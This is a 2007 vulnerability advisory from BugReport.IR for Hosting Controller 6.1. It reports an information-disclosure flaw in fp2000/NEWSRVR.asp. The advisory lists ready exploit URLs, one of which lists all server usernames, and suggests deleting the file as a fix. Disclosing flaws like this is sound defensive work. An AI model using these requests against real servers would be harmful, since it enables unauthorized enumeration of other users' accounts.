Title: Users can see all usernames in the server by "fp2000/NEWSRVR.asp".
Vendor: Hosting Controller
Version: 6.1 Hot fix <= 3.3
Vendor URL: www.hostingcontroller.com
Solution: N/A
Release Date: 2007 - December
Credit: BugReport.IR

####################
- Discussion:
####################

10- [User] can see all usernames in the server by "fp2000/NEWSRVR.asp".
 10.1- Some exploits are:
     http://[HC URL]/fp2000/NEWSRVR.asp?AdminName=OWNERNAME&AdminLevel=reseller
        http://[HC URL]/fp2000/NEWSRVR.asp?AdminName=hcadmin&AdminLevel=host
        And for all usernames: http://[HC URL]/fp2000/NEWSRVR.asp?AdminName=&AdminLevel=

[User] = (A user with a simple account.)

####################
- Solution:
####################

Unfortunately, there is no support from hosting controller about these bugs. Also, they told us that there is no more support for HC 6.1.
Fast Solution:
Delete or rename these files which are in "Hosting Controller\web\admin\": 

- "/fp2000/NEWSRVR.asp"


Also, you can contact "admin[4t}bugreport{d0t]ir" to fix all these bugs for you without changing or deleting any file if you want.

####################
- Credit :
####################

AmnPardaz Security Research Team - www.Bugreport.ir
Contact: admin[4t}bugreport{d0t]ir